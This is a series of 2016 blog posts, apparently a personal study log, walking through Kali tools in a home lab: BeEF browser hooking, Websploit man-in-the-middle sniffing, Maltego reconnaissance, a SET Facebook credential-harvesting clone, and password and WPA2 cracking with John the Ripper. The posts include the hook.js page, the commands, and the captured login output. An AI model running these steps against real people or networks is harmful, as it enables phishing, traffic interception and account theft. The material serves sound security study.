<p>Then, the attacker will ask all the bot machines send requests to the victim. The requests will be in a high frequency, and make the victim couldn’t handle all of them (run out of memory or CPU), eventually the service freezed. <a href="http://ufonet.03c8.net/">UFONet</a> is one tool I found online that is designed to test/launch DDoS attacks written in Python.</p>
Heron Yanghttp://www.blogger.com/profile/13927972839081766610noreply@blogger.com0tag:blogger.com,1999:blog-3461379477139754715.post-11073744637341067102016-04-04T17:16:00.001+08:002016-04-04T17:16:58.335+08:00Keyword Spotting for Controlling Window Background Color<p>This is a small testing program that uses both CMUSphinx and GTK+ to demonstrate keyword spotting (KWS) algorithm.</p>
<p>KWS is the technique used to detect the keyword at anytime. Yes, this is the technique applied for “Okay, Google” and “Hey, Siri”. Whenever the keyword is heard by the machine, some callback function will be fired up.</p>
<h3 id="history">History</h3>
<ul>
<li>Originally, Hidden Markov Model system</li>
<li>Google, 2014, <a href="http://www.clsp.jhu.edu/~guoguo/papers/icassp2014_dnn_hotword.pdf">Deep Neural Network (DNN)</a>, demos outperformance to HMM system</li>
<li>Google, 2015, <a href="http://www.isca-speech.org/archive/interspeech_2015/papers/i15_1478.pdf">Convolutional Neural Networks (CNNs)</a>, demos outperformance to DNN
<ul>
<li>ignore input topology, as the (fixed) input can be presented in any order without affecting the performance of the network</li>
<li>not explicitly designed to model translational variance within speech signals, which can exist due to different speaking styles / capture translational invariance with far fewer parameters by averaging the outputs of hidden units</li>
</ul></li>
</ul>
<h3 id="tools">Tools</h3>
<p><a href="http://cmusphinx.sourceforge.net/">CMU Sphinx Project by Carnegie Mellon University</a></p>
<ul>
<li>CMU LTI, Language Technology Institute</li>
<li>Designed to be adopted on different platforms including iOS, Android, Raspberry Pi, etc.</li>
<li>License: BSD-style (nice!)</li>
</ul>
<p><a href="https://wolfpaulus.com/journal/embedded/raspberrypi2-sr/">Raspberry Pi 2 – Speech Recognition on device</a></p>
<ul>
<li>Upload word list to http://www.speech.cs.cmu.edu/tools/lmtool-new.html</li>
<li>Link .lm and .dict file, command: <code>pocketsphinx_continuous -inmic yes -lm 0730.lm -dict 0730.dic -samprate 16000/8000/48000</code></li>
</ul>
<h3 id="mycode">My Code</h3>
<p>Github link: <a href="https://github.com/heronyang/kws-color-demo">https://github.com/heronyang/kws-color-demo</a></p>
<h4 id="components">Components</h4>
<p>In <code>main.c</code>, the program fires up a thread for handling GUI jobs right after it started. Then, it started to setup pocketsphinx and call <code>recognize_from_microphone</code> or <code>recognize_from_file</code> for the audio input. Since argc/argv is passed into the settings, the user can specify the dictionary file or log file as what is written in <code>run.sh</code>.</p>
<h4 id="run">Run</h4>
<pre><code>> ./run.sh
</code></pre>
<h4 id="demo">Demo</h4><br />
<iframe width="640" height="480" src="https://www.youtube.com/embed/QKDa5MwBejE?rel=0" frameborder="0" allowfullscreen></iframe>Heron Yanghttp://www.blogger.com/profile/13927972839081766610noreply@blogger.com0tag:blogger.com,1999:blog-3461379477139754715.post-41100966010444480182016-04-01T16:47:00.000+08:002016-04-01T16:47:36.029+08:00Kali Tool Series - BeEF“BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.”<br />
<br />
<h3 id="howitworks">
How It Works</h3>
Basically, first start the BeEF server, then let the victim run hook.js on his/her browser, and we can know information of victims’ machines or control them.<br />
<br />
<h4 id="startbeefserver">
Start BeEF Server</h4>
<pre><code>> beef-xss
[*] Please wait as BeEF services are started.
[*] You might need to refresh your browser once it opens.
[*] UI URL: http://127.0.0.1:3000/ui/panel
[*] Hook: <script src="http://<IP>:3000/hook.js"></script>
[*] Example: <script src="http://127.0.0.1:3000/hook.js"></script>
…
</code></pre>
Then, open the browser with URL <code>http://127.0.0.1:3000/ui/panel</code> on Kali, and you’ll see the BeEF Control Panel.<br />
<br />
<h4 id="letvictimrunhook.js">
Let Victim Run hook.js</h4>
I’m not including the strategies of letting people to run hook.js in real world, which I believe some social engineering is involved. Instead, I am running a simple server on Kali using another port other than 3000 (used by BeEF Server), then let the victim open the webpage which has hook.js embedded.<br />
<br />
<strong>Setup the Web Page</strong><br />
Usually, some frauding may be involved here, but I am ignoring them for study purpose. What I built now is barely a blank page with label “hello”. Save following page as <code>index.html</code> somewhere on Kali.<br />
<pre><code><!DOCTYPE html>
<html>
<head>
</head>
<body>
<h1>hello</h1>
<script src="http://192.168.63.155:3000/hook.js"></script>
</body>
</html>
</code></pre>
<code>192.168.63.155</code> is the IP of Kali, which is a local IP, so only other machines under the same local network can access later on.<br />
<br />
<strong>Setup the Web Server</strong><br />
I am using Python Simple HTTP Server, so:<br />
<pre><code>> python -m SimpleHTTPServer 8000
Serving HTTP on 0.0.0.0 port 8000 ...
</code></pre>
And, the web server will start and be listening to port 8000.<br />
<br />
<strong>Victim Visit</strong><br />
As Kali is running in a VM, I visit the site just set on my host machine (Mac). Simply opening <code>http://192.168.63.155:8000</code> will work.<br />
<br />
<h4 id="controlthevictim">
Control the Victim</h4>
On Kali, you can see a new item popped up on the lefthand list. You can start to read the victim’s information or control it.<br />
<br />
<h3 id="whatyoucando">
What You Can Do</h3>
On the command tab in the BeEF Control Panel, you can see a list of action you can do to the victim. Well, in my experiment, quite a lot of them don’t work, possibly because the browsers had fixed the security flaw, or just because the BeEF code wasn’t update to date.<br />
On BeEF Cantrol Panel, different color circle next to the actions represent different status:<br />
<ul>
<li>green : works on the target; invisible.</li>
<li>orange : works on the target; visible.</li>
<li>grey : must yet be verified if it works.</li>
<li>red : does not work on the target.</li>
</ul>
Here, I will list some actions I found working.<br />
<br />
<h4 id="playsound">
Play Sound</h4>
This command is to play a sound on the target machine by giving the sound URL. I randomly searched on <a href="http://www.findsounds.com/">www.findsounds.com</a>, and got this link:<br />
<pre><code>http://princezze.free.fr/sounds/laugh.MP3
</code></pre>
Put it onto the panel, then it works.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzetDX158RPu17W4Pi_4QOMHAouXqEKEb9ccXRn3jUWUdpfKGY01BHyd6NRRiDXq3nx5qNELUANPsAt0olGTRx7ncWpQiqaEkIB3FHXcM006ZmwcMpNY0_hF_RznR3Nf-9klXA7Jx1LEWR/s1600/Screen+Shot+2016-04-01+at+2.42.56+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="238" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzetDX158RPu17W4Pi_4QOMHAouXqEKEb9ccXRn3jUWUdpfKGY01BHyd6NRRiDXq3nx5qNELUANPsAt0olGTRx7ncWpQiqaEkIB3FHXcM006ZmwcMpNY0_hF_RznR3Nf-9klXA7Jx1LEWR/s640/Screen+Shot+2016-04-01+at+2.42.56+PM.png" width="640" /></a></div>
<br />
<h4 id="iframeeventlogger">
iFrame Event Logger</h4>
This one allows the attacker to open website by providing the URL. It won’t work on the sites that check its origin. That is, if you try to open Google.com, then you will get following error in the victim’s browser console.<br />
<pre><code>[Error] Refused to display 'https://www.google.com/?gws_rd=ssl' in a frame because it set 'X-Frame-Options' to 'SAMEORIGIN'.
</code></pre>
But, it’s fine if you open other simple websites like <code>http://www.heron.me/</code>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXNzzzyw9M6OFmrUDToi14gw6eX7LTcUkhyphenhyphennnypFqinNlZdGEUJWVAAUJ3_U4kr7lZ80vIIYemzfJPKXJZyZE-zERxhsJlG4CSdfNnckC0_LhweT5_6dZyxCdkb4NY8YZiIUektgyMbPL-/s1600/Screen+Shot+2016-04-01+at+3.15.10+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="246" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXNzzzyw9M6OFmrUDToi14gw6eX7LTcUkhyphenhyphennnypFqinNlZdGEUJWVAAUJ3_U4kr7lZ80vIIYemzfJPKXJZyZE-zERxhsJlG4CSdfNnckC0_LhweT5_6dZyxCdkb4NY8YZiIUektgyMbPL-/s640/Screen+Shot+2016-04-01+at+3.15.10+PM.png" width="640" /></a></div>
<br />
<br />
<h4 id="excutejavascriptcode">
Excute JavaScript Code</h4>
This is the point. As the attack was trigger by the user when he/she runs hook.js, all the further actions are done by passing JavaScripts code from the attackers to the victim. So, “excuting JavaScript code” on the attacker’s demand will bring the maximun flexiblilty.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiatGnIsCSVjO6Cs4cfe-jLHERkBGn7HVuUvSj1XA9SeA_J7cR9VpwqQ5QBrxRVSJxSqOCsQJynT2BPxrtxLC-mfVxgyJcLpgV4AA5UGDxbt2uOAKysBJ5xHiyGa-1u4bdPFUxZZjoiER4w/s1600/Screen+Shot+2016-04-01+at+3.39.09+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="138" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiatGnIsCSVjO6Cs4cfe-jLHERkBGn7HVuUvSj1XA9SeA_J7cR9VpwqQ5QBrxRVSJxSqOCsQJynT2BPxrtxLC-mfVxgyJcLpgV4AA5UGDxbt2uOAKysBJ5xHiyGa-1u4bdPFUxZZjoiER4w/s640/Screen+Shot+2016-04-01+at+3.39.09+PM.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcDtnPQ67QFCT0M3TIHdyARx1A8WU9HmCOXo5X3MlXxvoqGCvOWgPnCetgIZlW5hykfsBajoTe5jCVSmfKTIJzex4pAvqSUluOYTKpnM0F8TP69qRd1xZQ-vTq_7NT_VNFcB94lmHfIvPT/s1600/Screen+Shot+2016-04-01+at+3.39.25+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="336" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcDtnPQ67QFCT0M3TIHdyARx1A8WU9HmCOXo5X3MlXxvoqGCvOWgPnCetgIZlW5hykfsBajoTe5jCVSmfKTIJzex4pAvqSUluOYTKpnM0F8TP69qRd1xZQ-vTq_7NT_VNFcB94lmHfIvPT/s640/Screen+Shot+2016-04-01+at+3.39.25+PM.png" width="640" /></a></div>
<br />
<br />
<h3 id="other">
Other</h3>
Some commands don’t show the result on the control panel, or they are showed in somewhere I couldn’t find. So, I switched to my favorite Terminal, and found the results.<br />
They are saved in a sqlite .db file, by using the sqlite tool, we can access the result:<br />
<pre><code>> cd /var/lib/beef-xss
> sqlitebrowser beef.db
</code></pre>
Check the <code>core_results</code> table for the results.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQyBk7xpEha7kBsz6_0Aabb8k7LwzPSr5QzLZCwmb-_aOohioiGeAvdYQBWfZI1kWM4Eup6bmEjClLHq6KNqtC6w0_UB8OwOjNrCugxHCNsi8WKFntDxaZ-bgdI1i_8384VTxz5xxBz3DY/s1600/Screen+Shot+2016-04-01+at+3.19.42+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="376" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQyBk7xpEha7kBsz6_0Aabb8k7LwzPSr5QzLZCwmb-_aOohioiGeAvdYQBWfZI1kWM4Eup6bmEjClLHq6KNqtC6w0_UB8OwOjNrCugxHCNsi8WKFntDxaZ-bgdI1i_8384VTxz5xxBz3DY/s640/Screen+Shot+2016-04-01+at+3.19.42+PM.png" width="640" /></a></div>
<br />
<h3 id="reference">
Reference</h3>
<ul>
<li><a href="http://beefproject.com/">BeEF Project</a></li>
<li><a href="http://www.picateshackz.com/2015/09/kali-linux-tutorial-hack-web-browser-with-beff.html">Kali Linux Tutorial: Hack A Web Browser Using BeEF</a></li>
</ul>
Heron Yanghttp://www.blogger.com/profile/13927972839081766610noreply@blogger.com1tag:blogger.com,1999:blog-3461379477139754715.post-1570761066049753482016-03-30T17:46:00.000+08:002016-03-30T17:46:05.282+08:00Kali Tool Series - Websploit<p>Although it seems that there are other more handly tools for web exploits other than Websploit, it still interests me by having a similiar inferface as <a href="http://note.heron.me/2016/03/kali-tool-series-metasploit.html">Metasploit</a>.</p>
<h3 id="tostart">To Start</h3>
<pre><code>> websploit
__ __ ___ ____ _____ ____ _ ___ ____ ______
| |__| | / _]| \ / ___/| \| | / \| || |
| | | | / [_ | o )( \_ | o ) | | || | | |
| | | || _]| | \__ || _/| |___ | O || | |_| |_|
| ` ' || [_ | O | / \ || | | || || | | |
\ / | || | \ || | | || || | | |
\_/\_/ |_____||_____| \___||__| |_____| \___/|____| |__|
--=[WebSploit FrameWork
+---**---==[Version :2.0.5 BETA
+---**---==[Codename :We're Not Crying Wolf
+---**---==[Available Modules : 19
--=[Update Date : [r2.0.5-000 2.3.2014]
wsf >
</code></pre>
<p>Show available modules</p>
<pre><code>wsf > show modules
Web Modules Description
------------------- ---------------------
web/apache_users Scan Directory Of Apache Users
web/dir_scanner Directory Scanner
web/wmap Information Gathering From Victim Web Using (Metasploit Wmap)
web/pma PHPMyAdmin Login Page Scanner
web/cloudflare_resolver CloudFlare Resolver
Network Modules Description
------------------- ---------------------
network/arp_dos ARP Cache Denial Of Service Attack
network/mfod Middle Finger Of Doom Attack
network/mitm Man In The Middle Attack
network/mlitm Man Left In The Middle Attack
network/webkiller TCP Kill Attack
network/fakeupdate Fake Update Attack Using DNS Spoof
network/arp_poisoner Arp Poisoner
Exploit Modules Description
------------------- ---------------------
exploit/autopwn Metasploit Autopwn Service
exploit/browser_autopwn Metasploit Browser Autopwn Service
exploit/java_applet Java Applet Attack (Using HTML)
Wireless / Bluetooth Modules Description
------------------- ---------------------
wifi/wifi_jammer Wifi Jammer
wifi/wifi_dos Wifi Dos Attack
wifi/wifi_honeypot Wireless Honeypot(Fake AP)
bluetooth/bluetooth_pod Bluetooth Ping Of Death Attack
</code></pre>
<h3 id="cases">Cases</h3>
<p>Here, I am going to try some modules in Websploit. And, the target will be my own Metasploitable2 virtual machine. Make sure you don’t try any actions described here on a running machine that doesn’t belong to you.</p>
<h4 id="scandirectories">Scan Directories</h4>
<p>We are scanning the directories under the target machine using HTTP requests with bruteforce. As far as I know, <a href="http://sectools.org/tool/dirbuster/">DirBuster</a> is also famous for doing this job. And, by doing this action, it’s easy for the target machine to be noticed since lots of invalid requests will be sent out in a short period.</p>
<pre><code>wsf > use web/dir_scanner
wsf:Dir_Scanner > show options
Options Value
--------- --------------
TARGET http://google.com
wsf:Dir_Scanner > set target http://192.168.63.156
TARGET => 192.168.63.156
wsf > run
…
</code></pre>
<p>However, I don’t think the program does a good job as it doesn’t print out the result in the same time, the user might have to wait util it’s completed. And, it usually takes a long time.</p>
<h4 id="maninthemiddle">Man in the Middle</h4>
<p><em>Man in the Middle</em> is an interesting attack. The attacker stay silent and steal the network traffic from the victim, then pass it over. That is, the victim may not notice that his/her traffic is totally monitored by the attacker.</p>
<p>Attacker side:</p>
<pre><code>wsf > use network/mitm
wsf:MITM > show options
Options Value RQ Description
--------- -------------- ---- --------------
Interface eth0 yes Network Interface Name
ROUTER 192.168.1.1 yes Router IP Address
TARGET 192.168.1.2 yes Target IP Address
SNIFFER driftnet yes Sniffer Name (Select From Sniffer List)
SSL true yes SSLStrip, For SSL Hijacking(true or false)
Sniffers Description
------------ --------------
dsniff Sniff All Passwords
msgsnarf Sniff All Text Of Victim Messengers
urlsnarf Sniff Victim Links
driftnet Sniff Victim Images
wsf:MITM > set TARGET 192.168.63.156
TARGET => 192.168.63.156
wsf:MITM > set ROUTER 192.169.63.1
ROUTER => 192.169.63.1
wsf:MITM > set SNIFFER urlsnarf
SNIFFER => urlsnarf
wsf:MITM > run
[*]IP Forwarding ...
[*]ARP Spoofing ...
[*]Sniffer Starting ...
urlsnarf: listening on eth0 [tcp port 80 or port 8080 or port 3128]
</code></pre>
<p>Then, the victim start to browse the Internet. I’m letting the victim run <code>wget google.com</code> to simulate Internet surfing.</p>
<p>Back to the attacker, here’s that he/she recieved:</p>
<pre><code>192.168.63.156 - - [30/Mar/2016:17:36:16 +0800] "GET http://google.com/ HTTP/1.0" - - "-" "Wget/1.10.2"
192.168.63.156 - - [30/Mar/2016:17:36:26 +0800] "GET http://www.google.com.tw/?gfe_rd=cr&ei=D577VtbIMZCS9QWylY-AAw HTTP/1.0" - - "-" "Wget/1.10.2"
</code></pre>
<h3 id="reference">Reference</h3>
<ul>
<li><a href="http://www.hackingtutorials.org/web-application-hacking/websploit-directory-scanner-scanning-webserver-directories/">Websploit Directory Scanner – Scanning</a></li>
<li><a href="http://tools.kali.org/web-applications/websploit">WebSploit Package Description</a></li>
<li><a href="http://cyborg.ztrela.com/websploit.php/">WebSploit Advanced MITM Framework</a></li>
</ul>
Heron Yanghttp://www.blogger.com/profile/13927972839081766610noreply@blogger.com0tag:blogger.com,1999:blog-3461379477139754715.post-58768398124120693752016-03-29T17:36:00.000+08:002016-03-29T17:36:44.704+08:00Kali Tool Series - MaltegoMaltego is a reconnaissance tool built into Kali developed by Paterva, which is a powerful information gathering tool that deals with Internet infrastructures to personal information and social networks.<br />
<h3 id="palette">
Palette</h3>
Palette, here, refers to the object types supported by Maltego for drawing the network graph of the target. For each object type, it means an item in real world, and obtains relavant attributes. By running <em>tranform</em> actions, we can expand one object to the whole network of interest.<br />
In Maltego, we got following types in Palette:<br />
<ul>
<li>Device</li>
<li>Infrastructure
<ul>
<li>AS</li>
<li>DNS Name</li>
<li>Domain</li>
<li>IPv4 Address</li>
<li>MX Record</li>
<li>NS Record</li>
<li>Netblock</li>
<li>URL</li>
<li>UniqueIdentifier</li>
<li>Website</li>
</ul>
</li>
<li>Locations
<ul>
<li>Circular Area</li>
<li>GPS Coordinate</li>
<li>Location</li>
</ul>
</li>
<li>Personal
<ul>
<li>Alias</li>
<li>Document</li>
<li>Email Address</li>
<li>Image</li>
<li>Person</li>
<li>Phone Number</li>
<li>Phrase</li>
</ul>
</li>
<li>Social Network
<ul>
<li>Facebook</li>
<li>Twitter</li>
</ul>
</li>
</ul>
<h3 id="steps">
Steps</h3>
<strong>Step 1 - Open Maltego</strong><br />
Open Maltego at Application menu → Information Gathering → Maltego (or, just type <code>maltego</code> in Terminal), then register an account, select transform seeds to install.<br />
<strong>Step 2 - Pick a Start Node</strong><br />
You can start from a website URL, a person, or anything that mentioned above in the Palette.<br />
<strong>Step 3 - Expand</strong><br />
Right click on the object, then perform “transform” action, which will expand the graph by providing more connection to other objects.<br />
<br />
<h3 id="exampleoutput">
Example Output</h3>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1reFgC7pQiN6DeJleU9UX2RIYV5HKODK3EVJmYIcZwqBzQjrKYIPkoKa6aa8PbhI8tMNOpOut9h708wA7Z5bcjeLljakS72TuyXBiGcQRCjt12NKH06wVLAYCIciBZTBmdsYGHcm8igHP/s1600/Screen+Shot+2016-03-29+at+4.24.36+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1reFgC7pQiN6DeJleU9UX2RIYV5HKODK3EVJmYIcZwqBzQjrKYIPkoKa6aa8PbhI8tMNOpOut9h708wA7Z5bcjeLljakS72TuyXBiGcQRCjt12NKH06wVLAYCIciBZTBmdsYGHcm8igHP/s640/Screen+Shot+2016-03-29+at+4.24.36+PM.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Gather information starts from my domain, heron.me.</td></tr>
</tbody></table>
<div>
<br /></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsV_uhy1tcGV8a8LX65pIkMUx-wf32-ca_x5qZnsM8ZXFRFtF_oVqTyhonW2193Hn0oadwBKfYSW2nt1CRIsHSrNYRa2tkrTLrQvm9F-NWt9NDL5FuF5zY3mTXyNRy9zuWVv6njA9MxNqK/s1600/Screen+Shot+2016-03-29+at+4.41.31+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="494" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsV_uhy1tcGV8a8LX65pIkMUx-wf32-ca_x5qZnsM8ZXFRFtF_oVqTyhonW2193Hn0oadwBKfYSW2nt1CRIsHSrNYRa2tkrTLrQvm9F-NWt9NDL5FuF5zY3mTXyNRy9zuWVv6njA9MxNqK/s640/Screen+Shot+2016-03-29+at+4.41.31+PM.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Gather information starts from me, "Heron Yang".</td></tr>
</tbody></table>
<br />
<h3 id="transformseeds">
Transform Seeds</h3>
Seeds are small pieces of XML that tell the Maltego client where it should look (at which servers) for transforms. Seeds can be thought of as something like the index of a book where you can use that to see where the relevant content is located.<br />
<br />
<h3 id="reference">
Reference</h3>
<ul>
<li><a href="https://www.packtpub.com/networking-and-servers/web-penetration-testing-kali-linux">Web Penetration Testing with Kali Linux</a></li>
<li><a href="https://www.cybrarypentesting.com/information-gathering-with-maltego/">Maltego tutorial of Information gathering tools in Kali Linux</a></li>
<li><a href="http://dev.paterva.com/developer/system/TDS_Transforms/server/seeds.php">Seeds</a></li>
</ul>
Heron Yanghttp://www.blogger.com/profile/13927972839081766610noreply@blogger.com0tag:blogger.com,1999:blog-3461379477139754715.post-65747072266672870642016-03-25T16:39:00.000+08:002016-03-25T16:39:28.472+08:00Kali Tool Series - The Social-Engineer Toolkit<h3 id="preface">
Preface</h3>
“Social Engineering” is a sub-field of network security. It’s much more un-related to the technical things, but frauding people around in order to hack into an unauthorized system.<br />
<br />
<strong>The content here is only for studying purpose, one SHOULD NOT deploy in real world environment, which is illegal. While you practice, make sure you test on your own machines only and don’t fraud people</strong>.<br />
<br />
<h3 id="buildafishingwebsite">
Build a Fishing Website</h3>
The basic example, we are building a fake login website for people to put username and password.<br />
<pre><code>> setoolkit
The Social-Engineer Toolkit is a product of TrustedSec.
Visit: https://www.trustedsec.com
Select from the menu:
1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set> 1
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) Third Party Modules
99) Return back to the main menu.
set> 2
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) Full Screen Attack Method
8) HTA Attack Method
99) Return to Main Menu
set:webattack> 3
The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.
The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.
The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.
1) Web Templates
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu
set:webattack>1
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
</code></pre>
Then, it will ask the IP of your Kali machine, which can be accessed by <code>ifconfig</code> command. Mine is 192.168.63.155 here.<br />
<pre><code>set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.63.155
1. Java Required
2. Google
3. Facebook
4. Twitter
5. Yahoo
set:webattack>2
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.63.155
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:http://www.facebook.com/
[*] Cloning the website: https://login.facebook.com/login.php
[*] This could take a little bit...
The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] Apache is set to ON - everything will be placed in your web root directory of apache.
[*] Files will be written out to the root directory of apache.
[*] ALL files are within your Apache directory since you specified it to ON.
Apache webserver is set to ON. Copying over PHP file to the website.
Please note that all output from the harvester will be found under apache_dir/harvester_date.txt
Feel free to customize post.php in the /var/www directory
[*] All files have been copied to /var/www
{Press return to continue}
</code></pre>
Now, you’re all set. By default, the files are generated at <code>/var/www/</code>. However, we have to put them into <code>/var/www/html/</code>, which is the default folder of apache.<br />
<pre><code>> cd /var/www/
> mkdir html/facebook
> mv index.html html/facebook/
> mv post.php har*txt html/
</code></pre>
Okay, then open the url (mine is http://192.168.63.155/facebook/) on any machine that can reach your Kali machine.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhS47zzM7icwDnX0leWUuvKsA0IIKuBhzQRmCBy8qMDD1Afkov2rS0rDnn4ihg5UKedsiSt8tl-sF1Ol1vNBo17POlf08qTYPr3HoIOUljF8tYThxtxhiyHC3drV9VJ-sM4g4oXJoytBCj8/s1600/Screen+Shot+2016-03-25+at+4.11.06+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="386" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhS47zzM7icwDnX0leWUuvKsA0IIKuBhzQRmCBy8qMDD1Afkov2rS0rDnn4ihg5UKedsiSt8tl-sF1Ol1vNBo17POlf08qTYPr3HoIOUljF8tYThxtxhiyHC3drV9VJ-sM4g4oXJoytBCj8/s640/Screen+Shot+2016-03-25+at+4.11.06+PM.png" width="640" /></a></div>
<br />
<br />
Finally, you will get the username and password in harvester_….txt file:<br />
<pre><code>> cat /var/www/html/har*.txt
Array
(
[lsd] => AVqaOX85
[display] =>
[enable_profile_selector] =>
[isprivate] =>
[legacy_return] => 1
[profile_selector_ids] =>
[skip_api_login] =>
[signed_next] =>
[trynum] => 1
[timezone] => -825
[lgndim] => eyJ3IjoxNDQwLCJoIjo5MDAsImF3IjoxNDQ… =
[lgnrnd] => 194144_MLVw
[lgnjs] => 1458894004
[email] => apple
[pass] => banana
[login] => 1
[default_persistent] => 0
[qsstamp] => W1tbOSwxMiwWEtwbVV6am45Zzd3…
)
</code></pre>
Heron Yanghttp://www.blogger.com/profile/13927972839081766610noreply@blogger.com1tag:blogger.com,1999:blog-3461379477139754715.post-16685457221370266332016-03-19T20:33:00.000+08:002016-03-19T20:33:37.543+08:00Kali Tool Series - John the Ripper<p>John the Ripper is a tool for getting passwords by bruteforcing. <strong>Make sure you don’t apply any of followings more others’ accounts or services.</strong> Try your own accounts or services.</p>
<h3 id="getpasswordofanunix-likemachine">Get Password of an Unix-like Machine</h3>
<p>Followings are only work with an unix-like machine, and the user had already gained the access of files on it. That is, we need <code>/etc/passwd</code> and <code>/etc/shadow</code> (only <code>/etc/passwd</code> for acient machine).</p>
<pre><code>> unshadow /etc/passwd /etc/shadow > ~/passwd
</code></pre>
<p>Use John’s default word list to crack the password:</p>
<pre><code>> john ~/passwd
</code></pre>
<p>Use custom wordlist:</p>
<pre><code>> john --wordlist=word.list ~/passwd
</code></pre>
<p>where <code>word.list</code> is your custom list.</p>
<p>To show the result:</p>
<pre><code>> john --show ~/passwd
</code></pre>
<h3 id="crackwifi">Crack Wifi</h3>
<h4 id="usewordlistwpa2">Use Wordlist (WPA2)</h4>
<p>Use <em>wireshark</em> or <em>airodump-ng</em> to get .cap file of the traffic. Then:</p>
<pre><code>> aircrack-ng –w wordlist.lst -b 00:0c:29:80:9a:85 my_traffic*.cap
</code></pre>
<p>where -b option indicates the MAC of your targetting BSSID, and input files are those .cap files.</p>
<h4 id="tryall">Try All</h4>
<p>Another solution is to try every possible password which is guaranteed to found the password, but it might also take forever.</p>
<pre><code>> john -stdout -incremental | aircrack-ng -b 00:0c:29:80:9a:85 -w - my_traffic*.cap
</code></pre>
<h3 id="sessioncontrol">Session Control</h3>
<p>To run a long password testing process, we can make it run in the background:</p>
<pre><code>> john --session=all_rules_session --wordlist=all.lst &
</code></pre>
<p>To check the session status:</p>
<pre><code>> john --status=all_rules_session
0g 0:00:00:02 2/3 0g/s 411.5p/s 411.5c/s 411.5C/s
</code></pre>
<p>To restore the session:</p>
<pre><code>> john --restore
</code></pre>
<h3 id="passwordwordlist">Password Wordlist</h3>
<p>For longer wordlist, one can find it online. However, there are some existing wordlist on Kali for users to apply.</p>
<pre><code>> ls /usr/share/wordlists/
dirb dirbuster dnsmap.txt fasttrack.txt fern-wifi metasploit metasploit-jtr nmap.lst rockyou.txt.gz sqlmap.txt termineter.txt wfuzz
</code></pre>
<p>they are wordlist files from different applications:</p>
<pre><code>> file /usr/share/wordlists/*
/usr/share/wordlists/dirb: symbolic link to /usr/share/dirb/wordlists
/usr/share/wordlists/dirbuster: symbolic link to /usr/share/dirbuster/wordlists
...
/usr/share/wordlists/wfuzz: symbolic link to /usr/share/wfuzz/wordlist
</code></pre>
<p>Interestingly, the best wordlist is actually hidden in the <code>rockyou.txt.gz</code>, so:</p>
